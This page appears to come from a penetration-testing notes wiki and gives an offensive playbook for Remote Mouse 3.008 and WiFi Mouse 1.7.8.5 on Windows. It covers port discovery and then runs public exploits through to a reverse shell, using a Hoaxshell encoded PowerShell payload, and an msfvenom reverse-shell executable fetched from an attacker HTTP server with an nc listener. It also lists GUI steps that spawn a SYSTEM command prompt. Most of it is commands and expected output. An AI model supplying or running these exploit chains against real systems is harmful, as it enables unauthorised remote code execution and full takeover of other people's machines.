Remote Mouse

Remote Mouse is Windows desktop control software. If it is installed and running, check both the exposed control ports and the local GUI attack surface.

Discovery

Look for the process and listening ports:

tasklist /svc | findstr /i RemoteMouse
netstat -ano | findstr /i "1978 1979 1980"

Common listeners:

TCP    0.0.0.0:1978    0.0.0.0:0    LISTENING
TCP    0.0.0.0:1979    0.0.0.0:0    LISTENING
TCP    0.0.0.0:1980    0.0.0.0:0    LISTENING
UDP    0.0.0.0:1978    *:*

Map the PID back to the binary:

Get-Process -Id <PID>

Scan externally if the host firewall allows it:

nmap -sT TARGET -p 1978,1979,1980

Remote Mouse 3.008

Known public references:

CVE-2021-35448
https://www.exploit-db.com/exploits/50047
https://www.exploit-db.com/exploits/50258
https://github.com/p0dalirius/RemoteMouse-3.008-Exploit

Network Command Execution

If TCP 1978 is reachable, Remote Mouse can be abused remotely to send keystrokes and execute commands.

Confirm command execution with ICMP first:

sudo tcpdump -i tun0 icmp

Modify the exploit command from calc.exe to a ping:

SendString("ping -n 4 ATTACKER_IP", ip)

Run the Python 2 exploit:

python 46697.py TARGET

Expected output:

('SUCCESS! Process calc.exe has run on target', 'TARGET')

Expected callback:

IP TARGET > ATTACKER_IP: ICMP echo request
IP ATTACKER_IP > TARGET: ICMP echo reply

For a shell, Hoaxshell worked through the Python 3 exploit:

python3 hoaxshell.py -s ATTACKER_IP -p 80
wget https://raw.githubusercontent.com/p0dalirius/RemoteMouse-3.008-Exploit/refs/heads/master/RemoteMouse-3.008-Exploit.py
python3 RemoteMouse-3.008-Exploit.py -t TARGET -c "powershell -e ENCODED_HOAXSHELL_PAYLOAD"

Long encoded payloads are slow because the exploit types characters into the target. In the observed path, the delay was about half a second per character and the payload took several minutes to finish.

Successful shell:

PS C:\Users\divine >

Check context:

whoami /all

Useful indicators after shell access:

RemoteMouseService.exe
RemoteMouseCore.exe
RemoteMouse.exe

TCP    0.0.0.0:1978    0.0.0.0:0    LISTENING
TCP    0.0.0.0:1979    0.0.0.0:0    LISTENING
TCP    0.0.0.0:1980    0.0.0.0:0    LISTENING

The remote control ports may be exploitable from the network, and the local GUI can also be abused from an RDP session. If RDP credentials are needed, check FileZilla saved credentials.

Local GUI Privilege Escalation

If Remote Mouse 3.008 is running in the tray:

Open Remote Mouse from the system tray.
Go to Settings.
Click Change... in the Image Transfer Folder section.
In the Save As prompt, enter C:\Windows\System32\cmd.exe in the address bar.
Press Enter. A command prompt can spawn in the elevated Remote Mouse context.

Check context immediately:

whoami
# nt authority\system

WiFi Mouse 1.7.8.5

Port 1978 may also indicate WiFi Mouse rather than Remote Mouse. A useful banner indicator is:

1978/tcp open  unisql?
system windows 6.2
luminateOK

Public reference:

https://www.exploit-db.com/exploits/49601

Create a Windows reverse shell payload:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=8080 -f exe -o shell.exe

Host the payload on port 80 and start a listener:

python3 -m http.server 80
nc -nlvp 8080

Run a Python 3 compatible WiFi Mouse exploit that accepts the target, attacker HTTP host, HTTP port, and payload name:

python3 exploit.py TARGET ATTACKER_IP 80 shell.exe

Successful indicators:

[+] Retrieving payload
[+] Done! Check Your Listener?
GET /shell.exe HTTP/1.1
connect to [ATTACKER_IP] from (UNKNOWN) [TARGET] PORT
Microsoft Windows [Version 10.0.15063]
C:\Windows\system32>

PreviousFileZilla Server 0.9.60 beta Nextvm2 (Node.js sandbox)

Last updated 13 days ago